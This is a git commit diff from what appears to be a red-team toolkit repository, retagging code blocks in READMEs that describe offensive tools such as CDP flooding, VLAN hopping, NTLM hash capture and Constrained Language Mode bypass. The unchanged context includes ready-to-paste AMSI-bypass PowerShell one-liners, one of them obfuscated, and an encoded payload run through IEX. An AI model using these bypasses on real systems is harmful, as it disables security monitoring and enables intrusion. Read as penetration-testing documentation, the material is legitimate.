readmes changed

This commit is contained in:
Mariusz B. / mgeeky 2021-05-16 23:46:19 +02:00
parent ccf52e3dba
commit dfaf2ad518
6 changed files with 24 additions and 23 deletions

View File

@ -2,7 +2,7 @@
- **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored. - **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored.
``` ```powershell
c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
:: tamperUpx - a small utility that corrupts UPX-packed executables, :: tamperUpx - a small utility that corrupts UPX-packed executables,

View File

@ -3,7 +3,7 @@
- **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets. - **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets.
The effect will be similar to: The effect will be similar to:
``` ```shell
SW2960#show cdp traffic SW2960#show cdp traffic
CDP counters : CDP counters :
Total packets output: 361, Input: 11824 Total packets output: 361, Input: 11824
@ -28,7 +28,7 @@ victim's premises or to aid Password-Spraying efforts against exposed OWA
interface. interface.
Sample run: Sample run:
``` ```powershell
PS D:\> python3 .\exchangeRecon.py 10.10.10.9 PS D:\> python3 .\exchangeRecon.py 10.10.10.9
:: Exchange Fingerprinter :: Exchange Fingerprinter
@ -136,7 +136,7 @@ TODO:
- Implement sniffer hunting for used protocols and their auth strings - Implement sniffer hunting for used protocols and their auth strings
- Implement semi-auto mode that is first learning a network, then choosing specific attacks - Implement semi-auto mode that is first learning a network, then choosing specific attacks
``` ```bash
bash $ python RoutingAttackKit.py bash $ python RoutingAttackKit.py
:: Routing Protocols Exploitation toolkit :: Routing Protocols Exploitation toolkit
@ -236,7 +236,7 @@ Capturing on 'eth0'
Sample output: Sample output:
``` ```bash
$ ./VLANHopperDTP.py --help $ ./VLANHopperDTP.py --help
:: VLAN Hopping via DTP Trunk negotiation :: VLAN Hopping via DTP Trunk negotiation

View File

@ -26,7 +26,7 @@ Takes two files on input. Tries to find every line of the second file within the
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a) - **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
``` ```bash
user@my-box $ startkali user@my-box $ startkali
[>] Launching kali in headless [>] Launching kali in headless
[>] Awaiting for machine to get up... [>] Awaiting for machine to get up...

View File

@ -7,7 +7,7 @@
- **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ) - **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ )
The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself. The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself.
``` ```powershell
PS > $ExecutionContext.SessionState.LanguageMode PS > $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage ConstrainedLanguage
PS > .\Bypass-CLM.ps1 PS > .\Bypass-CLM.ps1
@ -48,7 +48,7 @@ FullLanguage
- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage: - **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage:
``` ```powershell
cmstp.exe /ni /s cmstp.inf cmstp.exe /ni /s cmstp.inf
``` ```
@ -63,7 +63,7 @@ cmstp.exe /ni /s cmstp.inf
Example: Example:
``` ```powershell
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA==')); $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
``` ```
@ -78,7 +78,7 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com
Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes. Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
``` ```powershell
PS > "amsiInitFailed" PS > "amsiInitFailed"
At line:1 char:1 At line:1 char:1
+ "amsiInitFailed" + "amsiInitFailed"
@ -97,12 +97,12 @@ amsiInitFailed
- OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases: - OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases:
* **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes. * **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes.
``` ```powershell
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5) [Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
``` ```
* **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes) * **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes)
``` ```powershell
$h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5) $h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
``` ```
@ -125,7 +125,7 @@ amsiInitFailed
- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates. - `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data. - `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
``` ```powershell
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09 PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
Loaded $FileFinderSearchSYSVol results. Loaded $FileFinderSearchSYSVol results.
Loaded $FileFinder results. Loaded $FileFinder results.
@ -176,7 +176,7 @@ This script can embed following data within constructed CSharp Task:
Example output **not minimized**: Example output **not minimized**:
``` ```powershell
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
@ -233,7 +233,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
**minimized** **minimized**
``` ```powershell
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m
:: Powershell via MSBuild inline-task XML payload generation script :: Powershell via MSBuild inline-task XML payload generation script
@ -251,13 +251,13 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`: This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`:
``` ```powershell
PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree
``` ```
or with new version of PowerView coming with it's `Get-DomainOU` cmdlet. or with new version of PowerView coming with it's `Get-DomainOU` cmdlet.
``` ```powershell
PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
+ CONTOSO + CONTOSO
+ SharedFolders + SharedFolders
@ -296,7 +296,7 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
- **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound. - **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound.
``` ```bash
$ ./markOwnedNodesInNeo4j.py kerberoasted.txt $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
[.] Connected to neo4j instance. [.] Connected to neo4j instance.
[.] Marking nodes (0..10) ... [.] Marking nodes (0..10) ...
@ -342,7 +342,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
- [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality - [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
``` ```powershell
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true
:: SharpWebServer :: :: SharpWebServer ::
@ -377,7 +377,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
* The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly * The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly
``` ```powershell
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1 PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.

View File

@ -31,7 +31,7 @@
- **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee)) - **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee))
``` ```python
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition # Simple utility that aids the penetration tester when manually testing Padding Oracle condition
# of a target cryptosystem, by generating set of test cases to fed the cryptosystem with. # of a target cryptosystem, by generating set of test cases to fed the cryptosystem with.
# #
@ -84,7 +84,7 @@ Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4
When `DEBUG` is turned on, the output may also look like: When `DEBUG` is turned on, the output may also look like:
``` ```bash
$ ./reencode.py JTQxJTQxJTQxJTQx $ ./reencode.py JTQxJTQxJTQxJTQx
[.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" [.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
[.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" [.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"

View File

@ -41,7 +41,8 @@ I've experienced following:
Use `--verbose` for additional _field steps explanation_ output. Use `--verbose` for additional _field steps explanation_ output.
Sample usage: Sample usage:
```
```powershell
PS> python3 rdpFileUpload.py -v -f certutil README.md PS> python3 rdpFileUpload.py -v -f certutil README.md
:: RDP file upload utility via Keyboard emulation. :: RDP file upload utility via Keyboard emulation.